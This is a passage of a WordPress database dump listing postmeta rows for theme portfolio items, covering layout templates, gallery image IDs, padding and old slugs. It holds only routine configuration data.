header_background_image_meta','no'),(4792,1540,'qodef_disable_header_widget_logo_area_meta','no'),(4793,1540,'qodef_disable_header_widget_menu_area_meta','no'),(4794,1540,'slide_template','default'),(4795,1540,'_wpb_vc_js_status','true'),(4796,1540,'qodef_title_area_type_meta','breadcrumbs'),(4797,1540,'qodef_page_content_top_padding','76'),(4798,1540,'qodef_page_content_top_padding_mobile','yes'),(4799,1540,'qodef_title_area_height_meta','140'),(4800,1540,'qodef_title_area_title_tag_meta','h2'),(4801,1540,'_wp_old_slug','full-width-images'),(4802,1540,'_wp_old_slug','full-width-images-2'),(4803,1540,'_wp_old_slug','images'),(4804,1540,'_wp_old_slug','big-images'),(4805,1540,'_thumbnail_id','1565'),(4806,1540,'_dp_original','1438'),(4807,1540,'_wp_old_slug','small-images'),(4808,1540,'_wp_old_slug','small-images-2'),(4809,1541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4810,1541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4811,1541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4812,1541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4813,1541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4814,1541,'qodef_page_content_behind_header_meta','no'),(4815,1541,'qodef_boxed_background_image_attachment_meta','fixed'),(4816,1541,'qodef-portfolio-image-gallery','1435,1434,1445'),(4817,1541,'qodef_portfolio_single_template_meta','slider'),(4818,1541,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4819,1541,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4820,1541,'portfolio_single_back_to_link','1730'),(4821,1541,'qodef_disable_vertical_header_background_image_meta','no'),(4822,1541,'qodef_disable_header_widget_logo_area_meta','no'),(4823,1541,'qodef_disable_header_widget_menu_area_meta','no'),(4824,1541,'slide_template','default'),(4825,1541,'_wpb_vc_js_status','true'),(4826,1541,'qodef_title_area_type_meta','breadcrumbs'),(4827,1541,'qodef_page_content_top_padding','76'),(4828,1541,'qodef_page_content_top_padding_mobile','yes'),(4829,1541,'qodef_title_area_height_meta','140'),(4830,1541,'qodef_title_area_title_tag_meta','h2'),(4831,1541,'_wp_old_slug','full-width-images'),(4832,1541,'_wp_old_slug','full-width-images-2'),(4833,1541,'_wp_old_slug','images'),(4834,1541,'_wp_old_slug','big-images'),(4835,1541,'_wp_old_slug','small-images'),(4836,1541,'_wp_old_slug','slider'),(4837,1541,'_dp_original','1440'),(4838,1541,'_wp_old_slug','big-slider'),(4839,1541,'_thumbnail_id','1566'),(4840,1541,'_wp_old_slug','big-slider-2'),(4841,1542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4842,1542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4843,1542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4844,1542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4845,1542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4846,1542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4847,1542,'qodef_page_content_behind_header_meta','no'),(4848,1542,'qodef_boxed_background_image_attachment_meta','fixed'),(4849,1542,'qodef-portfolio-image-gallery','1435,1434,1445'),(4850,1542,'qodef_portfolio_single_template_meta','small-slider'),(4851,1542,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4852,1542,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4853,1542,'portfolio_single_back_to_link','1730'),(4854,1542,'qodef_disable_vertical_header_background_image_meta','no'),(4855,1542,'qodef_disable_header_widget_logo_area_meta','no'),(4856,1542,'qodef_disable_header_widget_menu_area_meta','no'),(4857,1542,'slide_template','default'),(4858,1542,'_wpb_vc_js_status','true'),(4859,1542,'qodef_title_area_type_meta','breadcrumbs'),(4860,1542,'qodef_page_content_top_padding','76'),(4861,1542,'qodef_page_content_top_padding_mobile','yes'),(4862,1542,'qodef_title_area_height_meta','140'),(4863,1542,'qodef_title_area_title_tag_meta','h2'),(4864,1542,'_wp_old_slug','full-width-images'),(4865,1542,'_wp_old_slug','full-width-images-2'),(4866,1542,'_wp_old_slug','images'),(4867,1542,'_wp_old_slug','big-images'),(4868,1542,'_wp_old_slug','small-images'),(4869,1542,'_wp_old_slug','slider'),(4870,1542,'_wp_old_slug','big-slider'),(4871,1542,'_wp_old_slug','big-slider-2'),(4872,1542,'_dp_original','1442'),(4873,1542,'_wp_old_slug','small-slider'),(4874,1542,'_thumbnail_id','1567'),(4875,1542,'_wp_old_slug','small-slider-2'),(4876,1543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4877,1543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4878,1543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4879,1543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4880,1543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4881,1543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4882,1543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4883,1543,'qodef_page_content_behind_header_meta','no'),(4884,1543,'qodef_boxed_background_image_attachment_meta','fixed'),(4885,1543,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(4886,1543,'qodef_portfolio_single_template_meta','gallery'),(4887,1543,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4888,1543,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4889,1543,'portfolio_single_back_to_link','1730'),(4890,1543,'qodef_disable_vertical_header_background_image_meta','no'),(4891,1543,'qodef_disable_header_widget_logo_area_meta','no'),(4892,1543,'qodef_disable_header_widget_menu_area_meta','no'),(4893,1543,'slide_template','default'),(4894,1543,'_wpb_vc_js_status','true'),(4895,1543,'qodef_title_area_type_meta','breadcrumbs'),(4896,1543,'qodef_page_content_top_padding','76'),(4897,1543,'qodef_page_content_top_padding_mobile','yes'),(4898,1543,'qodef_title_area_height_meta','140'),(4899,1543,'qodef_title_area_title_tag_meta','h2'),(4900,1543,'_wp_old_slug','full-width-images'),(4901,1543,'_wp_old_slug','full-width-images-2'),(4902,1543,'_wp_old_slug','images'),(4903,1543,'_wp_old_slug','big-images'),(4904,1543,'_wp_old_slug','small-images'),(4905,1543,'_wp_old_slug','slider'),(4906,1543,'_wp_old_slug','big-slider'),(4907,1543,'_wp_old_slug','big-slider-2'),(4908,1543,'_wp_old_slug','small-slider'),(4909,1543,'_wp_old_slug','small-slider-2'),(4910,1543,'_dp_original','1444'),(4911,1543,'_wp_old_slug','big-gallery'),(4912,1543,'_thumbnail_id','1572'),(4913,1543,'_wp_old_slug','big-gallery-2'),(4914,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4915,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4916,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4917,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4918,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4919,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4920,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4921,1544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4922,1544,'qodef_page_content_behind_header_meta','no'),(4923,1544,'qodef_boxed_background_image_attachment_meta','fixed'),(4924,1544,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(4925,1544,'qodef_portfolio_single_template_meta','small-gallery'),(4926,1544,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4927,1544,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4928,1544,'portfolio_single_back_to_link','1730'),(4929,1544,'qodef_disable_vertical_header_background_image_meta','no'),(4930,1544,'qodef_disable_header_widget_logo_area_meta','no'),(4931,1544,'qodef_disable_header_widget_menu_area_meta','no'),(4932,1544,'slide_template','default'),(4933,1544,'_wpb_vc_js_status','true'),(4934,1544,'qodef_title_area_type_meta','breadcrumbs'),(4935,1544,'qodef_page_content_top_padding','76'),(4936,1544,'qodef_page_content_top_padding_mobile','yes'),(4937,1544,'qodef_title_area_height_meta','140'),(4938,1544,'qodef_title_area_title_tag_meta','h2'),(4939,1544,'_wp_old_slug','full-width-images'),(4940,1544,'_wp_old_slug','full-width-images-2'),(4941,1544,'_wp_old_slug','images'),(4942,1544,'_wp_old_slug','big-images'),(4943,1544,'_wp_old_slug','small-images'),(4944,1544,'_wp_old_slug','slider'),(4945,1544,'_wp_old_slug','big-slider'),(4946,1544,'_wp_old_slug','big-slider-2'),(4947,1544,'_wp_old_slug','small-slider'),(4948,1544,'_wp_old_slug','small-slider-2'),(4949,1544,'qodef_portfolio_single_gallery_columns_number_meta','two'),(4950,1544,'_dp_original','1459'),(4951,1544,'_wp_old_slug','small-gallery'),(4952,1544,'_thumbnail_id','1574'),(4953,1544,'_wp_old_slug','small-gallery-2'),(4954,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4955,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4956,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4957,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4958,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4959,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4960,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4961,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4962,1545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4963,1545,'qodef_page_content_behind_header_meta','no'),(4964,1545,'qodef_boxed_background_image_attachment_meta','fixed'),(4965,1545,'qodef-portfolio-image-gallery','4280,4278,4333,3377,4335'),(4966,1545,'qodef_portfolio_single_template_meta','masonry'),(4967,1545,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4968,1545,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4969,1545,'portfolio_single_back_to_link','1730'),(4970,1545,'qodef_disable_vertical_header_background_image_meta','no'),(4971,1545,'qodef_disable_header_widget_logo_area_meta','no'),(4972,1545,'qodef_disable_header_widget_menu_area_meta','no'),(4973,1545,'slide_template','default'),(4974,1545,'_wpb_vc_js_status','true'),(4975,1545,'qodef_title_area_type_meta','breadcrumbs'),(4976,1545,'qodef_page_content_top_padding','76'),(4977,1545,'qodef_page_content_top_padding_mobile','yes'),(4978,1545,'qodef_title_area_height_meta','140'),(4979,1545,'qodef_title_area_title_tag_meta','h2'),(4980,1545,'_wp_old_slug','full-width-images'),(4981,1545,'_wp_old_slug','full-width-images-2'),(4982,1545,'_wp_old_slug','images'),(4983,1545,'_wp_old_slug','big-images'),(4984,1545,'_wp_old_slug','small-images'),(4985,1545,'_wp_old_slug','slider'),(4986,1545,'_wp_old_slug','big-slider'),(4987,1545,'_wp_old_slug','big-slider-2'),(4988,1545,'_wp_old_slug','small-slider'),(4989,1545,'_wp_old_slug','small-slider-2'),(4990,1545,'_wp_old_slug','small-gallery'),(4991,1545,'qodef_portfolio_single_gallery_columns_number_meta','two'),(4992,1545,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(4993,1545,'_dp_original','1463'),(4994,1545,'_wp_old_slug','big-masonry'),(4995,1545,'_wp_old_slug','big-masonry-2__trashed'),(4996,1545,'_thumbnail_id','1576'),(4997,1545,'_wp_old_slug','big-masonry-2'),(4998,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4999,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5000,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5001,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5002,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5003,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5004,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5005,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5006,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5007,1546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5008,1546,'qodef_page_content_behind_header_meta','no'),(5009,1546,'qodef_boxed_background_image_attachment_meta','fixed'),(5010,1546,'qodef-portfolio-image-gallery','4280,4278,3377,4333'),(5011,1546,'qodef_portfolio_single_template_meta','small-masonry'),(5012,1546,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5013,1546,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5014,1546,'portfolio_single_back_to_link','1730'),(5015,1546,'qodef_disable_vertical_header_background_image_meta','no'),(5016,1546,'qodef_disable_header_widget_logo_area_meta','no'),(5017,1546,'qodef_disable_header_widget_menu_area_meta','no'),(5018,1546,'slide_template','default'),(5019,1546,'_wpb_vc_js_status','true'),(5020,1546,'qodef_title_area_type_meta','breadcrumbs'),(5021,1546,'qodef_page_content_top_padding','76'),(5022,1546,'qodef_page_content_top_padding_mobile','yes'),(5023,1546,'qodef_title_area_height_meta','140'),(5024,1546,'qodef_title_area_title_tag_meta','h2'),(5025,1546,'_wp_old_slug','full-width-images'),(5026,1546,'_wp_old_slug','full-width-images-2'),(5027,1546,'_wp_old_slug','images'),(5028,1546,'_wp_old_slug','big-images'),(5029,1546,'_wp_old_slug','small-images'),(5030,1546,'_wp_old_slug','slider'),(5031,1546,'_wp_old_slug','big-slider'),(5032,1546,'_wp_old_slug','big-slider-2'),(5033,1546,'_wp_old_slug','small-slider'),(5034,1546,'_wp_old_slug','small-slider-2'),(5035,1546,'_wp_old_slug','small-gallery'),(5036,1546,'_wp_old_slug','big-masonry'),(5037,1546,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(5038,1546,'qodef_portfolio_single_masonry_columns_number_meta','two'),(5039,1546,'_dp_original','1474'),(5040,1546,'_wp_old_slug','small-masonry'),(5041,1546,'_thumbnail_id','1578'),(5042,1546,'_wp_old_slug','small-masonry-2'),(5043,1792,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5044,1792,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5045,1792,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5046,1792,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5047,1792,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5048,1792,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5049,1792,'qodef_page_content_behind_header_meta','no'),(5050,1792,'qodef_boxed_background_image_attachment_meta','fixed'),(5051,1792,'qodef-portfolio-image-gallery','1435,1434,1445'),(5052,1792,'qodef_portfolio_single_template_meta','slider'),(5053,1792,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5054,1792,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5055,1792,'portfolio_single_back_to_link','1730'),(5056,1792,'qodef_disable_vertical_header_background_image_meta','no'),(5057,1792,'qodef_disable_header_widget_logo_area_meta','no'),(5058,1792,'qodef_disable_header_widget_menu_area_meta','no'),(5059,1792,'slide_template','default'),(5060,1792,'_wpb_vc_js_status','true'),(5061,1792,'qodef_title_area_type_meta','breadcrumbs'),(5062,1792,'qodef_page_content_top_padding','76'),(5063,1792,'qodef_page_content_top_padding_mobile','yes'),(5064,1792,'qodef_title_area_height_meta','140'),(5065,1792,'qodef_title_area_title_tag_meta','h2'),(5066,1792,'_wp_old_slug','full-width-images'),(5067,1792,'_wp_old_slug','full-width-images-2'),(5068,1792,'_wp_old_slug','images'),(5069,1792,'_wp_old_slug','big-images'),(5070,1792,'_wp_old_slug','small-images'),(5071,1792,'_wp_old_slug','slider'),(5072,1792,'_wp_old_slug','big-slider'),(5073,1792,'_wp_old_slug','big-slider-2'),(5074,1792,'_thumbnail_id','2793'),(5075,1792,'_dp_original','1541'),(5076,1792,'_wp_old_slug','fantastic-2'),(5077,1794,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5078,1794,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5079,1794,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5080,1794,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5081,1794,'qodef_page_content_behind_header_meta','no'),(5082,1794,'qodef_boxed_background_image_attachment_meta','fixed'),(5083,1794,'qodef-portfolio-image-gallery','1435,1434,1445'),(5084,1794,'qodef_portfolio_single_template_meta','images'),(5085,1794,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5086,1794,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5087,1794,'portfolio_single_back_to_link','1730'),(5088,1794,'qodef_disable_vertical_header_background_image_meta','no'),(5089,1794,'qodef_disable_header_widget_logo_area_meta','no'),(5090,1794,'qodef_disable_header_widget_menu_area_meta','no'),(5091,1794,'slide_template','default'),(5092,1794,'_wpb_vc_js_status','true'),(5093,1794,'qodef_title_area_type_meta','breadcrumbs'),(5094,1794,'qodef_page_content_top_padding','76'),(5095,1794,'qodef_page_content_top_padding_mobile','yes'),(5096,1794,'qodef_title_area_height_meta','140'),(5097,1794,'qodef_title_area_title_tag_meta','h2'),(5098,1794,'_wp_old_slug','full-width-images'),(5099,1794,'_wp_old_slug','full-width-images-2'),(5100,1794,'_wp_old_slug','images'),(5101,1794,'_wp_old_slug','big-images'),(5102,1794,'_wp_old_slug','big-images-2'),(5103,1794,'_thumbnail_id','2796'),(5104,1794,'_dp_original','1539'),(5105,1794,'_wp_old_slug','mindful-2'),(5106,1795,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5107,1795,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5108,1795,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5109,1795,'qodef_page_content_behind_header_meta','no'),(5110,1795,'qodef_boxed_background_image_attachment_meta','fixed'),(5111,1795,'qodef-portfolio-image-gallery','1435,1434,1445'),(5112,1795,'qodef_portfolio_single_template_meta','huge-images'),(5113,1795,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5114,1795,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5115,1795,'portfolio_single_back_to_link','1730'),(5116,1795,'qodef_disable_vertical_header_background_image_meta','no'),(5117,1795,'qodef_disable_header_widget_logo_area_meta','no'),(5118,1795,'qodef_disable_header_widget_menu_area_meta','no'),(5119,1795,'slide_template','default'),(5120,1795,'_wpb_vc_js_status','true'),(5121,1795,'qodef_title_area_type_meta','breadcrumbs'),(5122,1795,'qodef_page_content_top_padding','76'),(5123,1795,'qodef_page_content_top_padding_mobile','yes'),(5124,1795,'qodef_title_area_height_meta','140'),(5125,1795,'qodef_title_area_in_grid_meta','no'),(5126,1795,'qodef_title_area_title_tag_meta','h2'),(5127,1795,'_thumbnail_id','2797'),(5128,1795,'_wp_old_slug','full-width-images'),(5129,1795,'_wp_old_slug','full-width-images-2'),(5130,1795,'_dp_original','1538'),(5131,1795,'_wp_old_slug','diet-2'),(5132,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5133,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5134,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5135,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5136,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5137,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5138,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5139,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5140,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5141,1796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5142,1796,'qodef_page_content_behind_header_meta','no'),(5143,1796,'qodef_boxed_background_image_attachment_meta','fixed'),(5144,1796,'qodef-portfolio-image-gallery','4280,4278,3377,4333'),(5145,1796,'qodef_portfolio_single_template_meta','small-masonry'),(5146,1796,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5147,1796,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5148,1796,'portfolio_single_back_to_link','1730'),(5149,1796,'qodef_disable_vertical_header_background_image_meta','no'),(5150,1796,'qodef_disable_header_widget_logo_area_meta','no'),(5151,1796,'qodef_disable_header_widget_menu_area_meta','no'),(5152,1796,'slide_template','default'),(5153,1796,'_wpb_vc_js_status','true'),(5154,1796,'qodef_title_area_type_meta','breadcrumbs'),(5155,1796,'qodef_page_content_top_padding','76'),(5156,1796,'qodef_page_content_top_padding_mobile','yes'),(5157,1796,'qodef_title_area_height_meta','140'),(5158,1796,'qodef_title_area_title_tag_meta','h2'),(5159,1796,'_wp_old_slug','full-width-images'),(5160,1796,'_wp_old_slug','full-width-images-2'),(5161,1796,'_wp_old_slug','images'),(5162,1796,'_wp_old_slug','big-images'),(5163,1796,'_wp_old_slug','small-images'),(5164,1796,'_wp_old_slug','slider'),(5165,1796,'_wp_old_slug','big-slider'),(5166,1796,'_wp_old_slug','big-slider-2'),(5167,1796,'_wp_old_slug','small-slider'),(5168,1796,'_wp_old_slug','small-slider-2'),(5169,1796,'_wp_old_slug','small-gallery'),(5170,1796,'_wp_old_slug','big-masonry'),(5171,1796,'_wp_old_slug','small-masonry'),(5172,1796,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(5173,1796,'qodef_portfolio_single_masonry_columns_number_meta','two'),(5174,1796,'_thumbnail_id','2798'),(5175,1796,'_dp_original','1474'),(5176,1796,'_wp_old_slug','fruity-2'),(5177,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5178,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5179,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5180,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5181,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5182,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5183,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5184,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5185,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5186,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5187,1787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5188,1787,'qodef_page_content_behind_header_meta','no'),(5189,1787,'qodef_boxed_background_image_attachment_meta','fixed'),(5190,1787,'qodef-portfolio-image-gallery','4280,4278,4333,3377'),(5191,1787,'qodef_portfolio_single_template_meta','small-masonry'),(5192,1787,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5193,1787,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5194,1787,'portfolio_single_back_to_link','1730'),(5195,1787,'qodef_disable_vertical_header_background_image_meta','no'),(5196,1787,'qodef_disable_header_widget_logo_area_meta','no'),(5197,1787,'qodef_disable_header_widget_menu_area_meta','no'),(5198,1787,'slide_template','default'),(5199,1787,'_wpb_vc_js_status','true'),(5200,1787,'qodef_title_area_type_meta','breadcrumbs'),(5201,1787,'qodef_page_content_top_padding','76'),(5202,1787,'qodef_page_content_top_padding_mobile','yes'),(5203,1787,'qodef_title_area_height_meta','140'),(5204,1787,'qodef_title_area_title_tag_meta','h2'),(5205,1787,'_wp_old_slug','full-width-images'),(5206,1787,'_wp_old_slug','full-width-images-2'),(5207,1787,'_wp_old_slug','images'),(5208,1787,'_wp_old_slug','big-images'),(5209,1787,'_wp_old_slug','small-images'),(5210,1787,'_wp_old_slug','slider'),(5211,1787,'_wp_old_slug','big-slider'),(5212,1787,'_wp_old_slug','big-slider-2'),(5213,1787,'_wp_old_slug','small-slider'),(5214,1787,'_wp_old_slug','small-slider-2'),(5215,1787,'_wp_old_slug','small-gallery'),(5216,1787,'_wp_old_slug','big-masonry'),(5217,1787,'_wp_old_slug','small-masonry'),(5218,1787,'_wp_old_slug','small-masonry-2'),(5219,1787,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(5220,1787,'qodef_portfolio_single_masonry_columns_number_meta','two'),(5221,1787,'_thumbnail_id','2775'),(5222,1787,'_dp_original','1546'),(5223,1787,'_wp_old_slug','cosmetics-2'),(5224,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5225,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5226,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5227,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5228,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5229,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5230,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5231,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5232,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5233,1788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5234,1788,'qodef_page_content_behind_header_meta','no'),(5235,1788,'qodef_boxed_background_image_attachment_meta','fixed'),(5236,1788,'qodef-portfolio-image-gallery','4280,4278,4333,3377,4335'),(5237,1788,'qodef_portfolio_single_template_meta','masonry'),(5238,1788,'qodef_portfolio_masonry_fixed_dimensions_meta','large-height'),(5239,1788,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5240,1788,'portfolio_single_back_to_link','1730'),(5241,1788,'qodef_disable_vertical_header_background_image_meta','no'),(5242,1788,'qodef_disable_header_widget_logo_area_meta','no'),(5243,1788,'qodef_disable_header_widget_menu_area_meta','no'),(5244,1788,'slide_template','default'),(5245,1788,'_wpb_vc_js_status','true'),(5246,1788,'qodef_title_area_type_meta','breadcrumbs'),(5247,1788,'qodef_page_content_top_padding','76'),(5248,1788,'qodef_page_content_top_padding_mobile','yes'),(5249,1788,'qodef_title_area_height_meta','140'),(5250,1788,'qodef_title_area_title_tag_meta','h2'),(5251,1788,'_wp_old_slug','full-width-images'),(5252,1788,'_wp_old_slug','full-width-images-2'),(5253,1788,'_wp_old_slug','images'),(5254,1788,'_wp_old_slug','big-images'),(5255,1788,'_wp_old_slug','small-images'),(5256,1788,'_wp_old_slug','slider'),(5257,1788,'_wp_old_slug','big-slider'),(5258,1788,'_wp_old_slug','big-slider-2'),(5259,1788,'_wp_old_slug','small-slider'),(5260,1788,'_wp_old_slug','small-slider-2'),(5261,1788,'_wp_old_slug','small-gallery'),(5262,1788,'_wp_old_slug','big-masonry'),(5263,1788,'_wp_old_slug','big-masonry-2__trashed'),(5264,1788,'_wp_old_slug','big-masonry-2'),(5265,1788,'qodef_portfolio_single_gallery_columns_number_meta','two'),(5266,1788,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(5267,1788,'_thumbnail_id','2774'),(5268,1788,'_dp_original','1545'),(5269,1788,'_wp_old_slug','variations-2'),(5270,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5271,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5272,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5273,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5274,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5275,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5276,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5277,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5278,1789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5279,1789,'qodef_page_content_behind_header_meta','no'),(5280,1789,'qodef_boxed_background_image_attachment_meta','fixed'),(5281,1789,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(5282,1789,'qodef_portfolio_single_template_meta','small-gallery'),(5283,1789,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5284,1789,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5285,1789,'portfolio_single_back_to_link','1730'),(5286,1789,'qodef_disable_ver